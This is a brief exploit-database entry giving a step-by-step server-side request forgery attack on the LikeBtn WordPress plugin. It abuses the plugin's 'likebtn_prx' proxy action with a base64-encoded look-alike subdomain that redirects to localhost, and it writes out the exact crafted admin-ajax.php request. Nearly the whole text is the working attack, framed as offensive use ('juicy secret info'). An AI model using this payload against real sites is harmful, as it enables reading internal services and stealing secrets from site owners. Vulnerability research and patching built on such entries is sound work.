## https://sploitus.com/exploit?id=WPEX-ID:6BC6023F-A5E7-4665-896C-95AFA5B638FB
Let's say that an attacker owns the website attackerwebsite.bla and wants to attack targetwebsite.bla which uses the LikeBtn WP plugin. The attacker would then do the following:
1. Create the subdomain likebtn.com.attackerwebsite.bla
2. Make the subdomain redirect to localhost
3. Base64 encode the URL to the new subdomain (http://likebtn.com.attackerwebsite.bla -> aHR0cDovL2xpa2VidG4uY29tLmF0dGFja2Vyd2Vic2l0ZS5ibGE=)
4. Make a request to https://targetwebsite.bla/wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q= aHR0cDovL2xpa2VidG4uY29tLmF0dGFja2Vyd2Vic2l0ZS5ibGE=
5. The attacker then receives all the juicy secret info stored on localhost